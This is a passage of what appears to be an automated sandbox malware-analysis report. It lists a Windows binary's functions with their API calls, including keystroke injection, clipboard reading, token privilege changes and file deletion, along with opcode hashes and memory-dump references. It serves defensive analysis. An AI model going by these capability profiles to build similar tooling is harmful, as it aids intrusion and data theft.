                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: %d/%02d/%02d
                                                                                                                              • API String ID: 3850602802-328681919
                                                                                                                              • Opcode ID: afba4fc953335c49906af9eb85611338a48ab1681a83732c2cf8b4095bdf192e
                                                                                                                              • Instruction ID: b5281f2bc78242a0f0110bf3ea5afcc31defec9576d2163f788f93808008a3ee
                                                                                                                              • Opcode Fuzzy Hash: afba4fc953335c49906af9eb85611338a48ab1681a83732c2cf8b4095bdf192e
                                                                                                                              • Instruction Fuzzy Hash: F312BCB1600204ABEB29CF64DC49FBE7BB9EF45710F50425AF51AEB2D0DB748941CB52
                                                                                                                              Function 0018F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 0018F796
                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001E4388
                                                                                                                              • IsIconic.USER32(000000FF), ref: 001E4391
                                                                                                                              • ShowWindow.USER32(000000FF,00000009), ref: 001E439E
                                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 001E43A8
                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001E43BE
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 001E43C5
                                                                                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 001E43D1
                                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001E43E2
                                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001E43EA
                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 001E43F2
                                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 001E43F5
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001E440A
                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 001E4415
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001E441F
                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 001E4424
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001E442D
                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 001E4432
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001E443C
                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 001E4441
                                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 001E4444
                                                                                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 001E446B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 4125248594-2988720461
                                                                                                                              • Opcode ID: f279b9890afcc2ce147f77467d9a9e1d754c01b567bcf1a6cb135989e34c1248
                                                                                                                              • Instruction ID: b62cd52f593d3bb7fda7a1a9755d4031b884d60cf503d28cb9a6601c9f1f8956
                                                                                                                              • Opcode Fuzzy Hash: f279b9890afcc2ce147f77467d9a9e1d754c01b567bcf1a6cb135989e34c1248
                                                                                                                              • Instruction Fuzzy Hash: D33150B1A40218BBEB216BB2AC49F7F7E6DEB44B54F114025FA05EA1D0D6B05941EEA0
                                                                                                                              Function 001B6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001731DA
                                                                                                                                • Part of subcall function 001B7B9F: __wsplitpath.LIBCMT ref: 001B7BBC
                                                                                                                                • Part of subcall function 001B7B9F: __wsplitpath.LIBCMT ref: 001B7BCF
                                                                                                                                • Part of subcall function 001B7C0C: GetFileAttributesW.KERNEL32(?,001B6A7B), ref: 001B7C0D
                                                                                                                              • _wcscat.LIBCMT ref: 001B6B9D
                                                                                                                              • _wcscat.LIBCMT ref: 001B6BBB
                                                                                                                              • __wsplitpath.LIBCMT ref: 001B6BE2
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 001B6BF8
                                                                                                                              • _wcscpy.LIBCMT ref: 001B6C57
                                                                                                                              • _wcscat.LIBCMT ref: 001B6C6A
                                                                                                                              • _wcscat.LIBCMT ref: 001B6C7D
                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 001B6CAB
                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 001B6CBC
                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 001B6CDB
                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 001B6CEA
                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 001B6CFF
                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 001B6D10
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001B6D37
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001B6D53
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001B6D61
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                              • String ID: \*.*
                                                                                                                              • API String ID: 1867810238-1173974218
                                                                                                                              • Opcode ID: b4b8ec27277e2b04932acaf9f52de9e70bd55dfc6834a2cb0bf4db1e64e84f9a
                                                                                                                              • Instruction ID: fdd25babc16fa5256b4da8f15729edb08a768cec9186fdb91267ab7d0eb77da2
                                                                                                                              • Opcode Fuzzy Hash: b4b8ec27277e2b04932acaf9f52de9e70bd55dfc6834a2cb0bf4db1e64e84f9a
                                                                                                                              • Instruction Fuzzy Hash: C151307290412CAACF21EBA0DC84EEE777DBF29304F4445DAE549A3041DB349B89CF61
                                                                                                                              Function 001C7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32(0020DBF0), ref: 001C70C3
                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 001C70D1
                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 001C70D9
                                                                                                                              • CloseClipboard.USER32 ref: 001C70E5
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 001C7101
                                                                                                                              • CloseClipboard.USER32 ref: 001C710B
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 001C7120
                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 001C712D
                                                                                                                              • GetClipboardData.USER32(00000001), ref: 001C7135
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 001C7142
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 001C7176
                                                                                                                              • CloseClipboard.USER32 ref: 001C7283
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3222323430-0
                                                                                                                              • Opcode ID: 4ee8d77560a15d8374f64dc8265478b5df4cea26580c9e69308bc938b129b69c
                                                                                                                              • Instruction ID: c9b2214352a748c2dd7788db84148525d4b06f0e6b23c40cc5b7795a1945a7fe
                                                                                                                              • Opcode Fuzzy Hash: 4ee8d77560a15d8374f64dc8265478b5df4cea26580c9e69308bc938b129b69c
                                                                                                                              • Instruction Fuzzy Hash: 8C51DD31208305ABD305EB64EC8AF7E77A9AFA8B11F05451DF54AD21E1EBB0D944CB62
                                                                                                                              Function 001AB9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001ABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001ABF0F
                                                                                                                                • Part of subcall function 001ABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001ABF3C
                                                                                                                                • Part of subcall function 001ABEC3: GetLastError.KERNEL32 ref: 001ABF49
                                                                                                                              • _memset.LIBCMT ref: 001ABA34
                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001ABA86
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001ABA97
                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001ABAAE
                                                                                                                              • GetProcessWindowStation.USER32 ref: 001ABAC7
                                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 001ABAD1
                                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001ABAEB
                                                                                                                                • Part of subcall function 001AB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 001AB8C5
                                                                                                                                • Part of subcall function 001AB8B0: CloseHandle.KERNEL32(?), ref: 001AB8D7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                              • String ID: $default$winsta0
                                                                                                                              • API String ID: 2063423040-1027155976
                                                                                                                              • Opcode ID: 54686435802d4fa9385fc9857e070b119cf62ec838b7270b40157779d44105a6
                                                                                                                              • Instruction ID: 283c6ca5c045a6cc3a2c906f71f99727a89f6ad9929eaa92d1058501863c90c9
                                                                                                                              • Opcode Fuzzy Hash: 54686435802d4fa9385fc9857e070b119cf62ec838b7270b40157779d44105a6
                                                                                                                              • Instruction Fuzzy Hash: 77818875804288AFDF11EFA4DD85EFEBBB9EF0A314F044119F914A6166DB318E54EB20
                                                                                                                              Function 001BFDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 001BFE03
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001BFE57
                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001BFE7C
                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001BFE93
                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 001BFEBA
                                                                                                                              • __swprintf.LIBCMT ref: 001BFF06
                                                                                                                              • __swprintf.LIBCMT ref: 001BFF3F
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • __swprintf.LIBCMT ref: 001BFF93
                                                                                                                                • Part of subcall function 0019234B: __woutput_l.LIBCMT ref: 001923A4
                                                                                                                              • __swprintf.LIBCMT ref: 001BFFE1
                                                                                                                              • __swprintf.LIBCMT ref: 001C0030
                                                                                                                              • __swprintf.LIBCMT ref: 001C007F
                                                                                                                              • __swprintf.LIBCMT ref: 001C00CE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                              • API String ID: 108614129-2428617273
                                                                                                                              • Opcode ID: 7ee906c16b2985aff18358c12415f38304d8629d5b0257cd679ee0654b1df990
                                                                                                                              • Instruction ID: 7b101b1935e8b1ae909f98def3784c245f237815361ca3de4488c220cd42bc31
                                                                                                                              • Opcode Fuzzy Hash: 7ee906c16b2985aff18358c12415f38304d8629d5b0257cd679ee0654b1df990
                                                                                                                              • Instruction Fuzzy Hash: 0AA10E72418344ABC315EBA4CC96DAFB7EDBFA8700F44491DF585C2151EB34EA49CBA2
                                                                                                                              Function 001C2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001C2065
                                                                                                                              • _wcscmp.LIBCMT ref: 001C207A
                                                                                                                              • _wcscmp.LIBCMT ref: 001C2091
                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 001C20A3
                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 001C20BD
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 001C20D5
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001C20E0
                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 001C20FC
                                                                                                                              • _wcscmp.LIBCMT ref: 001C2123
                                                                                                                              • _wcscmp.LIBCMT ref: 001C213A
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C214C
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00223A68), ref: 001C216A
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001C2174
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001C2181
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001C2191
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 1803514871-438819550
                                                                                                                              • Opcode ID: 04f84cf20fb68270d3d776b9e956883e839b704cb7501952d2fb774fa1efcb00
                                                                                                                              • Instruction ID: d139b5ab2ab7225748cd4660c8155e6bf839b189a39eb979d18dc51c5ffc186e
                                                                                                                              • Opcode Fuzzy Hash: 04f84cf20fb68270d3d776b9e956883e839b704cb7501952d2fb774fa1efcb00
                                                                                                                              • Instruction Fuzzy Hash: 11319131A012197BDF24EBA4EC48FEE77AD9F25360F14406AF911E3190DB74DA94CE60
                                                                                                                              Function 001DF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 001DF14B
                                                                                                                                • Part of subcall function 001DD5EE: ClientToScreen.USER32(?,?), ref: 001DD617
                                                                                                                                • Part of subcall function 001DD5EE: GetWindowRect.USER32(?,?), ref: 001DD68D
                                                                                                                                • Part of subcall function 001DD5EE: PtInRect.USER32(?,?,001DEB2C), ref: 001DD69D
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 001DF1B4
                                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001DF1BF
                                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001DF1E2
                                                                                                                              • _wcscat.LIBCMT ref: 001DF212
                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001DF229
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 001DF242
                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 001DF259
                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 001DF27B
                                                                                                                              • DragFinish.SHELL32(?), ref: 001DF282
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 001DF36D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                              • API String ID: 2166380349-3440237614
                                                                                                                              • Opcode ID: 677a7ee6b50b97392eb99c771eb6a124aad92fd0200352cfd39a02f6ab6367d6
                                                                                                                              • Instruction ID: 6180915c920749b3f15217b8311cb6d116b099c45c8a675266b6986650dd47ba
                                                                                                                              • Opcode Fuzzy Hash: 677a7ee6b50b97392eb99c771eb6a124aad92fd0200352cfd39a02f6ab6367d6
                                                                                                                              • Instruction Fuzzy Hash: 39614972108304AFC701EF64EC85EAFBBF9BF99710F004A1EF595961A1DB709A45CB62
                                                                                                                              Function 001C219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001C21C0
                                                                                                                              • _wcscmp.LIBCMT ref: 001C21D5
                                                                                                                              • _wcscmp.LIBCMT ref: 001C21EC
                                                                                                                                • Part of subcall function 001B7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001B7621
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 001C221B
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001C2226
                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 001C2242
                                                                                                                              • _wcscmp.LIBCMT ref: 001C2269
                                                                                                                              • _wcscmp.LIBCMT ref: 001C2280
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C2292
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00223A68), ref: 001C22B0
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001C22BA
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001C22C7
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001C22D7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 1824444939-438819550
                                                                                                                              • Opcode ID: 0f2ce712a825a3cd5b43f25c0db6bc362a6f8013a4e7fe91499112f8841ba73a
                                                                                                                              • Instruction ID: d40eb84b5d2deae3e585d5dc7e266a907415a39ead6cda8f737c158144465496
                                                                                                                              • Opcode Fuzzy Hash: 0f2ce712a825a3cd5b43f25c0db6bc362a6f8013a4e7fe91499112f8841ba73a
                                                                                                                              • Instruction Fuzzy Hash: 4831E1319012197BDF24EBE4EC48FEE73ADAF25320F1001A9E811A3190DB74DE95CA64
                                                                                                                              Function 00176BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove_memset
                                                                                                                              • String ID: Q\E$[$\$\$\$]$^
                                                                                                                              • API String ID: 3555123492-286096704
                                                                                                                              • Opcode ID: 90e9c0d87b71bfbd2ee93f6bdb5177e6d731d69a29fe5c577353096c7b2d9f33
                                                                                                                              • Instruction ID: 8e255f759df7967202d713a6f1f0b355b134791f038f7a984dbb994163d8d156
                                                                                                                              • Opcode Fuzzy Hash: 90e9c0d87b71bfbd2ee93f6bdb5177e6d731d69a29fe5c577353096c7b2d9f33
                                                                                                                              • Instruction Fuzzy Hash: 6F72DD71E00219DBDF29CF98C8906BDB7B1FF48314F2581A9D959AB381E734AE80DB50
                                                                                                                              Function 001DECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
